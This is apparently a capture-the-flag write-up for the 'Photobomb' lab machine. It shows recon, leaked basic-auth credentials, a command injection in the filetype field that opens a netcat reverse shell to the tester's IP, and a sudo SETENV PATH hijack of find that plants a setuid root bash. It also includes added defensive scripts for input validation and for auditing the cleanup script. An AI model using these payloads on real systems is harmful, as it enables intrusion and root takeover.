Photobomb

Recon

nmap_scan.log
Open 10.129.241.84:22
Open 10.129.241.84:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -sC -Pn" on ip 10.129.241.84

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBrVE9flXamwUY+wiBc9IhaQJRE40YpDsbOGPxLWCKKjNAnSBYA9CPsdgZhoV8rtORq/4n+SO0T80x1wW3g19Ew=
|   256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEp8nHKD5peyVy3X3MsJCmH/HIUvJT+MONekDg5xYZ6D
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP (80)

Writeup.png

Leaked Credentials

In the page source we can see the JavaScript file, which contains plaintext credentials 💀

└─$ curl http://photobomb.htb/photobomb.js
function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
  }
}
window.onload = init;

Creds: pH0t0:b0Mb!

SQLi

Writeup-1.png

When testing for SQLi the application crashed with a backtrace (I accidentally encoded the & sign and that was the reason)

Writeup-2.png

Leaked env:

Writeup-3.png

Command Injection

I was thinking heavily about SQLi, but when testing for Command Injection we get different output: a normal request takes ~2 sec, and with a 3 sec sleep added it takes >5 sec.

Writeup-4.png

curl makes a callback

└─$ listen 80
Ncat: Connection from 10.129.241.84:35510.
GET / HTTP/1.1
Host: 10.10.14.113
User-Agent: curl/7.68.0
Accept: */*
└─$ curl 'http://photobomb.htb/printer' -H 'Authorization: Basic cEgwdDA6YjBNYiE=' -d $'photo=kevin-charit-XZoaTJTnB9U-unsplash.jpg&filetype=jpg; busybox nc 10.10.14.113 4444 -e /bin/bash&dimensions=3000x2000'
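The injection above works because the filetype value is used in a server-side command without being validated. As an added example (not code from the writeup or from the Photobomb application, whose handler is not shown), here is what server-side validation of the three form fields plus a no-shell invocation look like, written as POSIX shell functions so they can be run against the request bodies from this writeup. The allowlists (jpg/png, digit-only WIDTHxHEIGHT, plain .jpg file names) and the convert_stub stand-in are assumptions chosen for the demo.

```shell
#!/bin/sh
# Added example; not code from the writeup or from the Photobomb application.
# Models the checks the /printer endpoint should apply to the three form
# fields seen in the request above. Allowlists are assumptions for the demo.

# Output format: allowlist match, never interpolated into a command string.
valid_filetype() {
  case "$1" in
    jpg|png) return 0 ;;
    *)       return 1 ;;
  esac
}

# Dimensions: WIDTHxHEIGHT, digits only, so "3000x2000" passes and
# "3000x2000; sleep 3" cannot.
valid_dimensions() {
  printf '%s' "$1" | grep -Eq '^[0-9]{1,5}x[0-9]{1,5}$'
}

# Photo: a bare file name (letters, digits, '-' and '_') ending in .jpg;
# no '/' or other characters, so path separators and shell metacharacters are rejected.
valid_photo() {
  printf '%s' "$1" | grep -Eq '^[A-Za-z0-9_-]+\.jpg$'
}

# check_request BODY: parse an x-www-form-urlencoded body (as sent with
# curl -d) into the three expected fields and validate each one.
# Returns 0 only when every field is acceptable and no unknown key is present.
check_request() {
  photo=""; filetype=""; dimensions=""
  old_ifs=$IFS
  set -f; IFS='&'            # split on '&' only; no glob expansion of values
  for pair in $1; do
    key=${pair%%=*}; val=${pair#*=}
    case "$key" in
      photo)      photo=$val ;;
      filetype)   filetype=$val ;;
      dimensions) dimensions=$val ;;
      *) IFS=$old_ifs; set +f; return 1 ;;
    esac
  done
  IFS=$old_ifs; set +f
  valid_photo "$photo" && valid_filetype "$filetype" && valid_dimensions "$dimensions"
}

# Hardened invocation pattern: the validated values go to the converter as
# separate argv entries, never through "sh -c" with a string built from input.
# CONVERT defaults to a stub that prints its argv so the example runs offline;
# on a real server it would be the image-conversion binary (assumption).
convert_stub() { printf 'argv: %s\n' "$@"; }
CONVERT=${CONVERT:-convert_stub}

resize_photo() {
  check_request "$1" || { echo "rejected request: $1" >&2; return 1; }
  "$CONVERT" "source_images/$photo" -resize "$dimensions" "out.$filetype"
}

# Demo on the legitimate body and on the timing-test variant from the writeup.
resize_photo 'photo=kevin-charit-XZoaTJTnB9U-unsplash.jpg&filetype=jpg&dimensions=3000x2000'
resize_photo 'photo=kevin-charit-XZoaTJTnB9U-unsplash.jpg&filetype=jpg; sleep 3&dimensions=3000x2000' || true
```

The allowlist on filetype is the check that matters most here: the injected value never matches `jpg|png`, so it never reaches a command at all, and even a value that passes is handed to the converter as its own argv entry rather than being re-parsed by a shell.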

Reverse Shell

└─$ pwncat-cs -lp 4444
[08:28:32] received connection from 10.129.241.84:40584                                        bind.py:84
(remote) wizard@photobomb:/home/wizard/photobomb$ id
uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)

User.txt

(remote) wizard@photobomb:/home/wizard/photobomb$ cat ../user.txt
baf544549755cc416da3db78109ae485

Privilege Escalation

(remote) wizard@photobomb:/home/wizard/photobomb$ sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh
(remote) wizard@photobomb:/home/wizard/photobomb$ cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

We have SETENV with sudo, and find (as well as chown) is not called by its absolute path, so a PATH we supply decides which binary runs as root.

(remote) wizard@photobomb:/home/wizard$ echo $'#!/bin/bash\ninstall -m4777 /bin/bash /tmp/rootbash' > find
(remote) wizard@photobomb:/home/wizard$ chmod +x find
(remote) wizard@photobomb:/home/wizard$ sudo PATH="/home/wizard:$PATH" /opt/cleanup.sh
(remote) wizard@photobomb:/home/wizard$ ls /tmp/rootbash -l
-rwsrwxrwx 1 root root 1183448 Dec  8 13:33 /tmp/rootbash
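The two weaknesses just used (SETENV lets the caller choose PATH, and find and chown are resolved through it) can be checked mechanically. The following is an added example, not part of the writeup or of the box: a small audit helper that reports bare-name command invocations and a missing PATH assignment, run against the cleanup script as quoted above and against a hardened rewrite that I constructed for comparison. The temp-file layout is only for the demo.

```shell
#!/bin/sh
# Added example; not code from the writeup or from the Photobomb box.
# Audits a root-run script for commands resolved through PATH and for a
# missing PATH assignment, then compares the original with a hardened rewrite.

# unpinned_commands SCRIPT CMD...  -> prints the CMDs that SCRIPT invokes
# without an absolute path; returns 0 if none, 1 if any were found.
unpinned_commands() {
  script="$1"; shift
  found=""
  for cmd in "$@"; do
    # a bare name counts when it follows line start, whitespace, ';', '|' or '&'
    # (so "/usr/bin/find" does not match, but "find" and "-exec chown" do)
    if grep -Eq "(^|[[:space:];|&])${cmd}([[:space:]]|$)" "$script"; then
      found="${found:+$found }$cmd"
    fi
  done
  [ -n "$found" ] && echo "$found" && return 1
  return 0
}

# pins_path SCRIPT -> 0 if the script assigns PATH itself instead of inheriting it.
pins_path() {
  grep -Eq '^(export[[:space:]]+)?PATH=' "$1"
}

demo_dir=$(mktemp -d)

# The script as found on the box (quoted from the writeup).
cat > "$demo_dir/cleanup_original.sh" <<'EOF'
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
EOF

# Hardened rewrite (constructed for this example): PATH is set by the script
# rather than inherited, and every external binary is called by absolute path.
cat > "$demo_dir/cleanup_hardened.sh" <<'EOF'
#!/bin/bash
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
cd /home/wizard/photobomb || exit 1

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
/usr/bin/find source_images -type f -name '*.jpg' -exec /bin/chown root:root {} \;
EOF

# audit SCRIPT: one-line verdict covering both checks.
audit() {
  f="$1"
  printf '%s: ' "$f"
  if pins_path "$f"; then printf 'PATH pinned; '; else printf 'PATH inherited; '; fi
  if unpinned_commands "$f" cat truncate find chown; then
    echo "all commands absolute"
  fi
}
audit "$demo_dir/cleanup_original.sh"    # reports: PATH inherited; find chown
audit "$demo_dir/cleanup_hardened.sh"    # reports: PATH pinned; all commands absolute
```

On the sudoers side the matching fix is to drop SETENV from the rule, so that env_reset and the configured secure_path apply and a caller-supplied PATH is refused; pinning PATH inside the script protects it even if the sudoers entry is left as-is.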

Root.txt

(remote) wizard@photobomb:/home/wizard$ /tmp/rootbash -p
(remote) root@photobomb:/home/wizard# cat /root/root.txt
9d72864ffe37f0f68018e62140516fb2
